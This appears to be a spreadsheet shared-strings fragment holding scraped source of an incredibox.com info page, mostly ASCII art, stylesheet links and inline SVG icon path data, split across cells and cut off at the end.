  <si>
    <t xml:space="preserve">..MM:                      
                                                      .. ZMM                        MM8  .                     
                                                        . MMM . .             </t>
  </si>
  <si>
    <t xml:space="preserve">..=MMM                          
                                                           NMMMM:..... .. . .ZMMMM7                           
                                                          . 8MMMMMMMM8ZODMMMMMMMM...                          
                                                            ..MM. 8MMMMMMMMI.MM+.                             
                                                               </t>
  </si>
  <si>
    <t>IMM . ...    MMI..                              
                                                                 IMM8.  ZMMO..                                
                                                                   ,MMMMM: .
                 + +</t>
  </si>
  <si>
    <t>+ +
                + + + +</t>
  </si>
  <si>
    <t>+ + + + + --&gt;
 &lt;meta name='robots' content='noindex, nofollow'&gt;&lt;link rel='stylesheet' href='https://use.fontawesome.com/releases/v5.0.13/css/all.css' integrity='sha384-DNOHZ68U8hZfKXOrtjWvjxusGo9WQnrNx2sqG0tfsghAvtVlRW3tvkXWZh58N9jp' crossorigin='anonymous'&gt;&lt;link rel='stylesheet' href='https://www.incredibox.com/css/style1671044107491.min.css'&gt;&lt;/head&gt;&lt;body class='page-info gray-light'&gt; &lt;svg aria-hidden='true' style='position: absolute; width: 0; height: 0; overflow: hidden;' version='1.1' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink'&gt;&lt;defs&gt;&lt;symbol id='ic-plug' viewBox='0 0 32 32'&gt;&lt;path d='M25.125 10.469c-0.144-0.146-0.344-0.236-0.565-0.236s-0.421 0.090-0.565 0.236l-3.291 3.291-2.464-2.464 3.291-3.296c0.146-0.144 0.236-0.344 0.236-0.565s-0.090-0.421-0.236-0.565l-0-0c-0.145-0.143-0.345-0.232-0.565-0.232s-0.42 0.088-0.565 0.232l-3.291 3.291-1.109-1.125c-0.049-0.047-0.116-0.077-0.189-0.077s-0.14 0.029-0.189 0.077l0-0-3.515 3.493c-0.874 0.93-1.412 2.185-1.412 3.567 0 2.878 2.333 5.211 5.211 5.211 1.381 0 2.637-0.537 3.569-1.414l-0.003 0.003 3.493-3.493c0.047-0.049 0.077-0.116 0.077-0.189s-0.029-0.14-0.077-0.189l-1.131-1.131 3.291-3.291c0.143-0.145 0.232-0.345 0.232-0.565s-0.088-0.42-0.232-0.565l0 0z'&gt;&lt;/path&gt;&lt;path d='M10.448 20.421l-1.68 1.68c-0.133 0.142-0.215 0.334-0.215 0.545 0 0.442 0.358 0.8 0.8 0.8 0.211 0</t>
  </si>
  <si>
    <t>0.403-0.082 0.546-0.215l-0 0 1.68-1.68c-0.429-0.33-0.8-0.702-1.12-1.117l-0.011-0.014z'&gt;&lt;/path&gt;&lt;/symbol&gt;&lt;symbol id='ic-schools' viewBox='0 0 32 32'&gt;&lt;path d='M26.133 18.827c0.183-0.249 0.294-0.563 0.294-0.901 0-0.009-0-0.019-0-0.028l0 0.001c0.001-0.021 0.002-0.046 0.002-0.070 0-0.414-0.186-0.784-0.48-1.032l-0.002-0.002v-2.613c0-0.218-0.177-0.395-0.395-0.395v0h-8.192c-0.394 0.142-0.848 0.224-1.322 0.224-0.013 0-0.027-0-0.040-0h0.002c-1.237 0-2.24-0.469-2.24-1.067s1.003-1.067 2.24-1.067c0.009-0 0.019-0 0.030-0 0.476 0 0.934 0.080 1.36 0.228l-0.029-0.009h8.16c0.005 0.001 0.011 0.002 0.017 0.002 0.050 0 0.091-0.041 0.091-0.091 0-0.041-0.027-0.075-0.064-0.087l-0.001-0-9.168-4.267c-0.116-0.056-0.251-0.088-0.395-0.088s-0.279 0.032-0.4 0.090l0.006-0.002-10.757 5.045c-0.106 0.044-0.179 0.147-0.179 0.267s0.073 0.223 0.177 0.266l0.002 0.001 10.757 5.045c0.116 0.056 0.251 0.088 0.395 0.088s0.279-0.032 0.4-0.090l-0.006 0.002 8.891-4.171v2.667c-0.327 0.239-0.537 0.622-0.537 1.054 0 0.037 0.002 0.073 0.004 0.108l-0-0.005c-0 0.012-0.001 0.025-0.001 0.039 0 0.343 0.119 0.659 0.317 0.908l-0.002-0.003c-0.37 0.491-0.597 1.109-0.608 1.779l-0</t>
  </si>
  <si>
    <t>0.003c-0.001 0.016-0.002 0.035-0.002 0.053 0 0.391 0.316 0.707 0.706 0.709h0.902c0.388-0.002 0.701-0.316 0.701-0.704 0-0.021-0.001-0.041-0.003-0.061l0 0.003c0-0.003 0-0.007 0-0.010 0-0.689-0.237-1.324-0.634-1.825l0.005 0.006z'&gt;&lt;/path&gt;&lt;path d='M15.728 20.549l-5.973-2.805v4.656c1.717 1.308 3.886 2.106 6.239 2.133l0.006 0c2.36-0.028 4.528-0.825 6.271-2.152l-0.026 0.019v-4.656l-5.973 2.805c-0.080 0.038-0.173 0.060-0.272 0.060s-0.192-0.022-0.276-0.062l0.004 0.002z'&gt;&lt;/path&gt;&lt;/symbol&gt;&lt;symbol id='ic-language' viewBox='0 0 32 32'&gt;&lt;path d='M16 6.133c-5.449 0-9.867 4.417-9.867 9.867s4.417 9.867 9.867 9.867c5.449 0 9.867-4.417 9.867-9.867v0c0-5.449-4.417-9.867-9.867-9.867v0zM23.221 10.72c0.979 1.318 1.607 2.95 1.716 4.721l0.001 0.025h-3.232c-0.031-1.361-0.223-2.663-0.56-3.906l0.026 0.114c0.786-0.274 1.462-0.597 2.096-0.982l-0.048 0.027zM15.467 15.467h-4.267c0.039-1.266 0.231-2.471 0.559-3.619l-0.025 0.104c1.11 0.304 2.391 0.496 3.711 0.533l0.023 0.001zM15.467 16.533v2.987c-1.334 0.039-2.606 0.231-3.821 0.56l0.115-0.026c-0.31-1.043-0.512-2.248-0.559-3.493l-0.001-0.027zM16.533 16.533h4.267c-0.039 1.266-0.231 2.471-0.559 3.619l0.025-0.104c-1.101-0.302-2.372-0.494-3.683-0.533l-0.024-0.001zM16.533 15.467v-2.987c1.334-0.039 2.606-0.231 3.821-0.56l-0.115 0.026c0.31 1.043 0.512 2.248 0.559 3.493l0.001 0.027zM22.635 10v0c-0.496 0.289-1.074 0.555-1.677 0.767l-0.072 0.022c-0.422-1.239-1.059-2.305-1.874-3.208l0.007 0.008c1.431 0.524 2.644 1.349 3.61 2.404l0.006 0.007zM19.968 11.067c-1.018 0.274-2.195 0.448-3.406 0.485l-0.023 0.001v-4.427c1.419 0.309 2.661 1.808 3.44 3.936zM15.467 7.12v4.427c-1.235-0.037-2.411-0.212-3.538-0.51l0.108 0.024c0.763-2.128 2.005-3.627 3.429-3.941zM12.997 7.579c-0.81 0.893-1.445 1.96-1.843 3.137l-0.018 0.063c-0.677-0.232-1.256-0.499-1.803-0.815l0.049 0.026c0.965-1.064 2.173-1.889 3.538-2.391l0.062-0.020zM10.864 11.664c-0.313 1.128-0.506 2.429-0.533 3.77l-0</t>
  </si>
  <si>
    <t>0.017h-3.2c0.108-1.789 0.728-3.415 1.713-4.755l-0.017 0.025c0.576 0.349 1.243 0.668 1.942 0.919l0.079 0.025zM8.795 21.264c-0.979-1.313-1.608-2.939-1.721-4.705l-0.001-0.026h3.2c0.031 1.361 0.223 2.663 0.56 3.906l-0.026-0.114c-0.778 0.276-1.447 0.598-2.074 0.982l0.048-0.027zM9.381 21.984c0.497-0.287 1.076-0.553 1.681-0.767l0.074-0.023c0.418 1.239 1.053 2.306 1.868 3.208l-0.007-0.008c-1.437-0.515-2.656-1.335-3.626-2.388l-0.006-0.006zM12.048 20.917c1.017-0.267 2.191-0.434 3.4-0.464l0.019-0v4.427c-1.424-0.315-2.667-1.813-3.445-3.941zM16.533 24.88v-4.427c1.235 0.037 2.411 0.212 3.538 0.51l-0.108-0.024c-0.763 2.128-2.005 3.627-3.429 3.941zM19.003 24.421c0.81-0.893 1.445-1.96 1.843-3.137l0.018-0.063c0.677 0.232 1.256 0.499 1.803 0.815l-0.049-0.026c-0.965 1.064-2.173 1.889-3.538 2.391l-0.062 0.020zM21.136 20.336c0.313-1.128 0.506-2.429 0.533-3.77l0-0.017h3.2c-0.108 1.789-0.728 3.415-1.713 4.755l0.017-0.025c-0.576-0.349-1.243-0.668-1.942-0.919l-0.079-0.025z'&gt;&lt;/path&gt;&lt;/symbol&gt;&lt;symbol id='ic-plus' viewBox='0 0 32 32'&gt;&lt;path d='M22.656 14.885h-5.557v-5.525c-0.006-0.603-0.495-1.090-1.098-1.093h-0c-0.304 0.002-0.579 0.126-0.779 0.325l0-0c-0.198 0.2-0.322 0.475-0.325 0.778v5.526l-5.552 0.037c-0.596 0.002-1.081 0.474-1.104 1.065l-0 0.002c0.006 0.607 0.497 1.098 1.103 1.104h5.553v5.525c-0 0.003-0 0.006-0 0.009 0</t>
  </si>
  <si>
    <t>0.607 0.492 1.099 1.099 1.099 0.307 0 0.585-0.126 0.784-0.329l0-0c0.198-0.2 0.322-0.475 0.325-0.778v-5.526h5.552c0.003 0 0.008 0 0.012 0 0.301 0 0.573-0.125 0.767-0.325l0-0c0.198-0.2 0.322-0.475 0.325-0.778v-0.001c0 0 0-0 0-0 0-0.612-0.493-1.109-1.103-1.115h-0.001z'&gt;&lt;/path&gt;&lt;/symbol&gt;&lt;symbol id='ic-tiktok' viewBox='0 0 32 32'&gt;&lt;path d='M22.843 14.475c-0.128 0-0.261 0-0.395 0-0.001 0-0.002 0-0.003 0-1.487 0-2.797-0.761-3.561-1.915l-0.010-0.016v6.597c0 2.686-2.178 4.864-4.864 4.864s-4.864-2.178-4.864-4.864c0-2.686 2.178-4.864 4.864-4.864 0.002 0 0.004 0 0.006</t>
  </si>
  <si>
    <t>0h-0c0.101 0 0.197 0 0.299 0v2.395c-0.084-0.014-0.187-0.026-0.291-0.032l-0.007-0c-1.322 0.063-2.37 1.151-2.37 2.483s1.048 2.419 2.365 2.482l0.006 0c0.012 0</t>
  </si>
  <si>
    <t>0.025 0 0.039 0 1.373 0 2.492-1.088 2.542-2.449l0-0.005v-11.168h2.293c0.22 2.053 1.869 3.659 3.922 3.813l0.014 0.001v2.667z'&gt;&lt;/path&gt;&lt;/symbol&gt;&lt;symbol id='ic-tumblr' viewBox='0 0 60</t>
  </si>
  <si>
    <t>60'&gt;&lt;path d='M31.9,35.39c0,2.16,1.09,2.91,2.82,2.91h2.47v5.5H32.52c-4.2,0-7.33-2.17-7.33-7.34V28.18H21.37V23.69a8.32,8.32,0,0,0,6.16-7.84H31.9V23H37v5.22H31.9v7.21'/&gt;&lt;/symbol&gt;&lt;symbol id='ic-dark' viewBox='0 0 32 32'&gt;&lt;path d='M16 7.2c-4.86 0-8.8 3.94-8.8 8.8s3.94 8.8 8.8 8.8c4.86 0 8.8-3.94 8.8-8.8v0c-0.006-4.858-3.942-8.794-8.799-8.8h-0.001zM21.589 20.187c-1.286 1.703-3.307 2.792-5.582 2.792-3.853 0-6.976-3.123-6.976-6.976 0-2.268 1.083-4.284 2.759-5.558l0.017-0.013c0.086-0.062 0.193-0.099 0.309-0.099 0.29 0 0.526 0.231 0.533 0.52v0.001c0 0.003 0</t>
  </si>
  <si>
    <t>0.007 0 0.011 0 4.686 3.799 8.485 8.485 8.485 0.017 0 0.034-0 0.051-0h-0.003c0.28 0.017 0.501 0.249 0.501 0.532 0 0.114-0.036 0.22-0.097 0.307l0.001-0.002z'&gt;&lt;/path&gt;&lt;/symbol&gt;&lt;symbol id='ic-kid' viewBox='0 0 32 32'&gt;&lt;path d='M12.987 14.859c0 0.736-0.597 1.333-1.333 1.333s-1.333-0.597-1.333-1.333c0-0.736 0.597-1.333 1.333-1.333s1.333 0.597 1.333 1.333z'&gt;&lt;/path&gt;&lt;path d='M21.68 14.859c0 0.736-0.597 1.333-1.333 1.333s-1.333-0.597-1.333-1.333c0-0.736 0.597-1.333 1.333-1.333s1.333 0.597 1.333 1.333z'&gt;&lt;/path&gt;&lt;path d='M17.979 19.493c-0.555 0.383-1.243 0.612-1.984 0.612s-1.429-0.229-1.996-0.62l0.012 0.008c-0.086-0.063-0.195-0.101-0.312-0.101-0.295 0-0.533 0.239-0.533 0.533 0 0.197 0.107 0.37 0.267 0.462l0.003 0.001c0.73 0.488 1.626 0.782 2.59 0.789h0.002c0.953-0.003 1.836-0.3 2.564-0.805l-0.015 0.010c0.143-0.097 0.235-0.259 0.235-0.443 0-0.295-0.239-0.534-0.534-0.534-0.111 0-0.215 0.034-0.3 0.093l0.002-0.001z'&gt;&lt;/path&gt;&lt;path d='M26.352 13.691c-0.113-0.345-0.432-0.591-0.808-0.591-0.227 0-0.432 0.089-0.584 0.233l0-0c-1.104-3.957-4.571-7.2-8.96-7.2s-7.856 3.243-8.96 7.2c-0.152-0.144-0.358-0.233-0.584-0.233-0.376 0-0.695 0.245-0.806 0.585l-0.002 0.006c-0.661 1.429 0.299 3.296 1.173 3.995 0.763 4.389 4.432 8.181 9.179</t>
  </si>
  <si>
    <t>8.181s8.416-3.792 9.179-8.181c0.875-0.699 1.835-2.565 1.173-3.995zM16 24.267c-4.405 0-7.733-4.149-7.733-8.267 0.043-3.143 1.761-5.875 4.3-7.349l0.041-0.022c1.207 1.223 2.882 1.98 4.735 1.98 0.053 0 0.106-0.001 0.158-0.002l-0.008 0c0.001 0 0.003 0 0.005 0 0.186 0 0.37-0.014 0.549-0.040l-0.020 0.002c0.219-0.009 0.394-0.186 0.4-0.405v-0.001c0.001-0.009 0.001-0.019 0.001-0.029 0-0.2-0.162-0.363-0.363-0.363-0.014 0-0.027 0.001-0.040 0.002l0.002-0c-1.365 0-1.568-1.227-1.6-2.016 4.187 0.267 7.296 4.267 7.296 8.24 0.011 4.117-3.317 8.267-7.723 8.267z'&gt;&lt;/path&gt;&lt;/symbol&gt;&lt;symbol id='ic-stop' viewBox='0 0 32 32'&gt;&lt;path d='M10.827 17.397c-0.096 0.731-0.459 0.661-0.869 0.277-0.376-0.439-0.779-0.832-1.215-1.187l-0.017-0.013c-1.12-0.896-1.989-1.013-2.549-0.475-0.475 0.453 0.389 1.467 1.184 2.352 1.307 1.445 1.936 3.397 3.947 4.944 1.336 1.249 3.137 2.017 5.116 2.017 0.104 0 0.208-0.002 0.312-0.006l-0.015 0c2.437 0 4.048-1.013 5.024-2.667 0.955-1.657 1.518-3.643 1.518-5.761 0-0.161-0.003-0.321-0.010-0.48l0.001 0.023c0-1.803-0.043-5.867-0.043-5.867 0-0.805-0.4-1.179-0.987-1.179s-0.944 0.373-0.944 1.179v3.915c0 0.368-0.298 0.667-0.667 0.667s-0.667-0.298-0.667-0.667v0-6.565c0-0.589-0.478-1.067-1.067-1.067s-1.067 0.478-1.067 1.067v0 6.581c0 0.368-0.298 0.667-0.667 0.667s-0.667-0.298-0.667-0.667v0-7.648c0-0.589-0.478-1.067-1.067-1.067s-1.067 0.478-1.067 1.067v0 7.648c0 0.368-0.298 0.667-0.667 0.667s-0.667-0.298-0.667-0.667v0-6.048c0-0.805-0.432-1.232-1.024-1.232s-1.019 0.416-1.019</t>
  </si>
  <si>
    <t>1.221c0 0-0.085 6.933-0.085 7.52 0.001 0.054 0.001 0.118 0.001 0.182 0 0.447-0.022 0.889-0.064 1.324l0.004-0.055z'&gt;&lt;/path&gt;&lt;/symbol&gt;&lt;symbol id='ic-gift' viewBox='0 0 32 32'&gt;&lt;path d='M15.2 12.155h-6.725c-0.003-0-0.007-0-0.011-0-0.335 0-0.607 0.269-0.613 0.602v1.67c0 0 0 0 0 0 0 0.106 0.086 0.192 0.192 0.192 0.002 0</t>
  </si>
  <si>
    <t>0.004-0 0.006-0h7.152z'&gt;&lt;/path&gt;&lt;path d='M16.8 14.619h7.152c0.002 0 0.003 0 0.005 0 0.106 0 0.192-0.086 0.192-0.192 0-0 0-0 0-0v0-1.669c-0.006-0.334-0.278-0.603-0.613-0.603-0.004 0-0.008 0-0.011 0h-6.725z'&gt;&lt;/path&gt;&lt;path d='M16.8 23.616h5.125c0.003 0 0.007 0 0.011 0 0.337 0 0.61-0.272 0.613-0.608v-6.79h-5.749z'&gt;&lt;/path&gt;&lt;path d='M15.2 16.219h-5.749v6.789c0.003 0.336 0.276 0.608 0.613 0.608 0.004 0</t>
  </si>
  <si>
    <t>0.008-0 0.011-0h5.125z'&gt;&lt;/path&gt;&lt;path d='M21.499 6.933c-0.404-0.428-0.976-0.695-1.61-0.695-0.602 0-1.149 0.241-1.548 0.631l0-0c-0.969 0.948-1.758 2.075-2.314 3.329l-0.027 0.068c-0.585-1.316-1.374-2.438-2.339-3.379l-0.002-0.002c-0.399-0.39-0.945-0.631-1.547-0.631-0.634 0-1.206 0.266-1.609 0.694l-0.001 0.001c-0.379 0.392-0.612 0.926-0.612 1.515 0 0.668 0.301 1.266 0.774 1.667l0.003 0.003c1.035 1.067 2.571 1.728 4.56 2.011h1.6c1.989-0.283 3.525-0.96 4.56-2.011 0.465-0.402 0.757-0.993 0.757-1.652 0-0.605-0.246-1.153-0.645-1.548l-0-0zM11.397 9.397c-0.667-0.677-0.507-1.323-0.133-1.701 0.217-0.227 0.521-0.369 0.858-0.373h0.001c0.312 0.005 0.594 0.132 0.8 0.336l-0-0c0.962 0.945 1.731 2.083 2.243 3.352l0.024 0.066c-1.471-0.157-2.776-0.767-3.798-1.685l0.006 0.005zM20.603 9.397c-1.016 0.913-2.321 1.523-3.762 1.677l-0.030 0.003c0.536-1.335 1.305-2.474 2.265-3.417l0.001-0.001c0.206-0.204 0.488-0.331 0.799-0.336h0.001c0.338 0.005 0.641 0.147 0.858 0.373l0 0c0.373 0.379 0.533 1.024-0.133 1.701z'&gt;&lt;/path&gt;&lt;/symbol&gt;&lt;symbol id='ic-apple' viewBox='0 0 32 32'&gt;&lt;path d='M20.603 14.997c0.020-1.423 0.776-2.665 1.903-3.366l0.017-0.010c-0.734-1.033-1.91-1.711-3.247-1.755l-0.007-0c-1.371-0.144-2.699 0.8-3.392 0.8s-1.787-0.8-2.944-0.779c-1.562 0.052-2.91 0.924-3.631 2.197l-0.011 0.022c-1.6 2.725-0.4 6.725 1.109 8.923 0.752 1.067 1.637 2.283 2.789 2.24s1.557-0.715 2.923-0.715 1.744 0.715 2.928 0.688 1.973-1.067 2.704-2.171c0.516-0.72 0.938-1.554 1.22-2.449l0.017-0.063c-1.404-0.601-2.372-1.968-2.379-3.562v-0.001z'&gt;&lt;/path&gt;&lt;path d='M18.373 8.421c0.574-0.681 0.923-1.568 0.923-2.537 0-0.106-0.004-0.21-0.012-0.314l0.001 0.014c-1.048 0.112-1.963 0.609-2.615 1.345l-0.004</t>
  </si>
  <si>
    <t>0.004c-0.582 0.655-0.937 1.523-0.937 2.473 0 0.091 0.003 0.18 0.010 0.269l-0.001-0.012c0.011 0 0.025 0 0.038 0 1.046 0 1.98-0.482 2.591-1.237l0.005-0.006z'&gt;&lt;/path&gt;&lt;/symbol&gt;&lt;symbol id='ic-burger' viewBox='0 0 32 32'&gt;&lt;path d='M20.88 12.267h-9.76c-0.442 0-0.8-0.358-0.8-0.8s0.358-0.8 0.8-0.8v0h9.76c0.442 0 0.8 0.358 0.8 0.8s-0.358 0.8-0.8 0.8v0z'&gt;&lt;/path&gt;&lt;path d='M20.88 16.8h-9.76c-0.442 0-0.8-0.358-0.8-0.8s0.358-0.8 0.8-0.8v0h9.76c0.442 0 0.8 0.358 0.8 0.8s-0.358 0.8-0.8 0.8v0z'&gt;&lt;/path&gt;&lt;path d='M20.88 21.333h-9.76c-0.442 0-0.8-0.358-0.8-0.8s0.358-0.8 0.8-0.8v0h9.76c0.442 0 0.8 0.358 0.8 0.8s-0.358 0.8-0.8 0.8v0z'&gt;&lt;/path&gt;&lt;/symbol&gt;&lt;symbol id='ic-check' viewBox='0 0 32 32'&gt;&lt;path d='M16 21.867c0.133-0.277 3.365-6.88 7.003-10.283 0.199-0.183 0.326-0.441 0.336-0.729l0-0.002c-0.003-0.587-0.48-1.061-1.067-1.061-0.268 0-0.513 0.099-0.7 0.262l0.001-0.001c-2.779 2.592-5.264 6.773-6.496 9.067l-0.315 0.576-0.48-0.496-4.384-4.24c-0.186-0.181-0.441-0.293-0.722-0.293-0.003 0-0.006 0-0.009 0h0c-0.008-0-0.018-0-0.027-0-0.574 0-1.040 0.466-1.040 1.040 0 0.009 0 0.019 0</t>
  </si>
  <si>
    <t>0.028l-0-0.001c0.003 0.29 0.125 0.55 0.32 0.736l0 0 5.867 5.691c0.19 0.181 0.447 0.292 0.73 0.293h0c0.027 0.002 0.059</t>
  </si>
  <si>
    <t>0.004 0.091 0.004s0.063-0.001 0.095-0.004l-0.004 0c0.354-0.055 0.646-0.276 0.797-0.58l0.003-0.006z'&gt;&lt;/path&gt;&lt;/symbol&gt;&lt;symbol id='ic-close' viewBox='0 0 32 32'&gt;&lt;path d='M17.131 16l4.144-4.144c0.133-0.142 0.215-0.334 0.215-0.545 0-0.442-0.358-0.8-0.8-0.8-0.211 0-0.403 0.082-0.546 0.215l0-0-4.144 4.144-4.144-4.144c-0.142-0.133-0.334-0.215-0.545-0.215-0.442 0-0.8 0.358-0.8 0.8 0 0.211 0.082 0.403 0.215 0.546l-0-0 4.144 4.144-4.144 4.144c-0.146 0.144-0.236 0.344-0.236 0.565s0.090 0.421 0.236 0.565l0 0c0.141 0.145 0.337 0.235 0.555 0.235 0.004 0</t>
  </si>
  <si>
    <t>0.007-0 0.011-0h-0.001c0.002 0 0.004 0 0.006 0 0.219 0 0.417-0.090 0.559-0.235l4.144-4.144 4.144 4.144c0.143 0.145 0.342 0.235 0.562 0.235 0.001 0 0.003 0</t>
  </si>
  <si>
    <t>0.004 0h-0c0.003 0 0.007 0 0.010 0 0.218 0 0.414-0.090 0.555-0.235l0-0c0.146-0.144 0.236-0.344 0.236-0.565s-0.090-0.421-0.236-0.565l-0-0z'&gt;&lt;/path&gt;&lt;/symbol&gt;&lt;symbol id='ic-copy' viewBox='0 0 32 32'&gt;&lt;path d='M18.133 11.467h-9.067c-0.442 0-0.8 0.358-0.8 0.8v0 11.2c0 0.442 0.358 0.8 0.8 0.8v0h9.067c0.442 0 0.8-0.358 0.8-0.8v0-11.2c0-0.442-0.358-0.8-0.8-0.8v0zM17.333 22.667h-7.467v-9.6h7.467z'&gt;&lt;/path&gt;&lt;path d='M22.933 7.733h-9.067c-0.442 0-0.8 0.358-0.8 0.8v0 0.8h9.067v9.6h-1.067v1.6h1.867c0.442 0 0.8-0.358 0.8-0.8v0-11.2c0-0.442-0.358-0.8-0.8-0.8v0z'&gt;&lt;/path&gt;&lt;/symbol&gt;&lt;symbol id='ic-downcloud' viewBox='0 0 32 32'&gt;&lt;path d='M19.227 20.437l-0.533 0.533-1.893 1.899v-5.867h-1.6v5.867l-2.4-2.432c-0.145-0.143-0.345-0.232-0.565-0.232s-0.42 0.088-0.565 0.232l0-0c-0.145 0.146-0.234 0.346-0.234 0.568s0.090 0.422 0.234 0.568l3.792 3.792c0.139 0.138 0.328 0.227 0.537 0.235l0.002 0c0 0 0.001 0 0.002 0 0.22 0 0.42-0.090 0.564-0.235l3.792-3.792c0.145-0.146 0.234-0.346 0.234-0.568s-0.090-0.422-0.234-0.568l0 0c-0.145-0.143-0.345-0.232-0.565-0.232s-0.42 0.088-0.565 0.232l0-0z'&gt;&lt;/path&gt;&lt;path</t>
  </si>
  <si>
    <t>d='M22.304 12.336v0c0-0.123 0-0.245 0-0.373-0.003-3.070-2.492-5.557-5.563-5.557-2.141 0-3.999 1.21-4.929 2.983l-0.015 0.031c-0.177-0.027-0.383-0.044-0.593-0.048l-0.004-0c-2.251 0-4.077 1.824-4.080 4.074v0c0 2.256 1.829 3.547 4.080 3.547h4v-3.808c0-0.442 0.358-0.8 0.8-0.8s0.8 0.358 0.8 0.8v0 3.808h5.504c1.435 0 2.597-0.629 2.597-2.059 0-1.434-1.163-2.597-2.597-2.597v0z'&gt;&lt;/path&gt;&lt;/symbol&gt;&lt;symbol id='ic-download' viewBox='0 0 32 32'&gt;&lt;path d='M13.968 18.027v0l1.429 1.424c0.154 0.155 0.367 0.251 0.603 0.251s0.449-0.096 0.603-0.251l0-0 1.429-1.424 3.989-3.989c0.155-0.156 0.25-0.371 0.251-0.608v-0c0-0.001 0-0.001 0-0.002 0-0.474-0.384-0.859-0.859-0.859-0.24 0-0.457 0.099-0.613 0.258l-0 0-0.533 0.571-3.413 3.387v-9.067c0-0.471-0.382-0.853-0.853-0.853s-0.853 0.382-0.853 0.853v0 9.067l-3.947-3.957c-0.155-0.153-0.368-0.247-0.603-0.247-0.471 0-0.854 0.379-0.859 0.849v0c0 0.237 0.096 0.452 0.251 0.608l-0-0z'&gt;&lt;/path&gt;&lt;path d='M21.536 21.6h-11.072c-0.442 0-0.8 0.358-0.8 0.8s0.358 0.8 0.8 0.8v0h11.072c0.442 0 0.8-0.358 0.8-0.8s-0.358-0.8-0.8-0.8v0z'&gt;&lt;/path&gt;&lt;/symbol&gt;&lt;symbol id='ic-edit' viewBox='0 0 32 32'&gt;&lt;path d='M9.6 12.267h8.8l0.533-1.6h-9.333c-0.442 0-0.8 0.358-0.8 0.8s0.358 0.8 0.8 0.8v0z'&gt;&lt;/path&gt;&lt;path d='M9.6 16.8h7.328l0.533-1.6h-7.861c-0.442 0-0.8 0.358-0.8 0.8s0.358 0.8 0.8 0.8v0z'&gt;&lt;/path&gt;&lt;path d='M9.515 19.733c-0.442 0-0.8 0.358-0.8 0.8s0.358 0.8 0.8 0.8v0h5.952l0.533-1.6h-6.485z'&gt;&lt;/path&gt;&lt;path d='M24.533 11.733l0.613-1.867c0.017-0.049 0.026-0.106 0.026-0.165 0-0.235-0.152-0.435-0.364-0.506l-0.004-0.001-2.325-0.763c-0.049-0.017-0.106-0.026-0.165-0.026-0.235 0-0.435 0.152-0.506 0.364l-0.001 0.004-0.619 1.893z'&gt;&lt;/path&gt;&lt;path d='M20.523 12.683l-2.965 9.067c-0.018 0.051-0.029 0.111-0.029 0.172 0 0.016 0.001 0.032 0.002 0.048l-0-0.002 0.56 3.611c0.001 0.032 0.027 0.057 0.059 0.057 0.020 0 0.037-0.010 0.048-0.025l0-0 2.603-2.587c0.049-0.053 0.087-0.118 0.111-0.188l0.001-0.004 2.965-9.067z'&gt;&lt;/path&gt;&lt;/symbol&gt;&lt;symbol id='ic-exclusive' viewBox='0 0 32 32'&gt;&lt;path d='M21.536 20.709h-11.072c-0.442 0-0.8 0.358-0.8 0.8s0.358 0.8 0.8 0.8v0h11.072c0.442 0 0.8-0.358 0.8-0.8s-0.358-0.8-0.8-0.8v0z'&gt;&lt;/path&gt;&lt;path d='M10.667 18.133h10.763c0.005 0 0.010 0 0.016 0</t>
  </si>
  <si>
    <t>0.392 0 0.724-0.255 0.841-0.607l0.002-0.006 1.797-6.064c0.003-0.011 0.005-0.024 0.005-0.037 0-0.082-0.067-0.149-0.149-0.149-0.032 0-0.061 0.010-0.085 0.027l0-0-5.221 3.568-2.448-7.467c-0.023-0.058-0.079-0.098-0.144-0.098s-0.121 0.040-0.144 0.097l-0 0.001-2.443 7.467-5.221-3.568c-0.024-0.016-0.053-0.026-0.085-0.026-0.082 0-0.149 0.067-0.149 0.149 0 0.013 0.002 0.026 0.005 0.038l-0-0.001 1.797 6.064c0.118 0.359 0.451 0.614 0.843 0.614 0.008 0 0.015-0 0.023-0l-0.001 0z'&gt;&lt;/path&gt;&lt;/symbol&gt;&lt;symbol id='ic-external' viewBox='0 0 32 32'&gt;&lt;path d='M24 8.8c0-0.442-0.358-0.8-0.8-0.8v0h-5.333c-0.222 0.001-0.424 0.090-0.571 0.235l0-0c-0.141 0.145-0.227 0.343-0.227 0.561 0 0.431 0.339 0.783 0.764 0.804l0.002 0h3.435l-2.133 2.133h0.331c0.442 0 0.8 0.358 0.8 0.8v0 0.331l2.133-2.133v3.435c0 0.442 0.358 0.8 0.8 0.8s0.8-0.358 0.8-0.8v0-3.499z'&gt;&lt;/path&gt;&lt;path d='M18.245 14.885l-3.28 3.28c-0.142 0.133-0.334 0.215-0.545 0.215-0.442 0-0.8-0.358-0.8-0.8 0-0.211 0.082-0.403 0.215-0.546l-0 0 5.301-5.301h-9.803c-0.442 0-0.8 0.358-0.8 0.8v0 10.133c0 0.442 0.358 0.8 0.8 0.8v0h10.133c0.442 0 0.8-0.358 0.8-0.8v0-9.803l-2.021 2.021z'&gt;&lt;/path&gt;&lt;/symbol&gt;&lt;symbol id='ic-eye' viewBox='0 0 32 32'&gt;&lt;path d='M23.931 15.739c-1.851-3.285-4.8-5.248-7.931-5.248s-6.080 1.963-7.931 5.248c-0.045 0.076-0.071 0.168-0.071 0.267s0.027 0.19 0.073 0.269l-0.001-0.003c1.851 3.285 4.8 5.248 7.931 5.248s6.080-1.963 7.931-5.248c0.045-0.076 0.071-0.168 0.071-0.267s-0.027-0.19-0.073-0.269l0.001 0.003zM16</t>
  </si>
  <si>
    <t>18.597c-1.437 0-2.603-1.165-2.603-2.603s1.165-2.603 2.603-2.603c1.437 0 2.603 1.165 2.603 2.603 0 0.002 0 0.004 0 0.006v-0c-0.003 1.435-1.167 2.597-2.603 2.597 0 0 0 0 0 0v0z'&gt;&lt;/path&gt;&lt;/symbol&gt;&lt;symbol id='ic-facebook' viewBox='0 0 32</t>
  </si>
  <si>
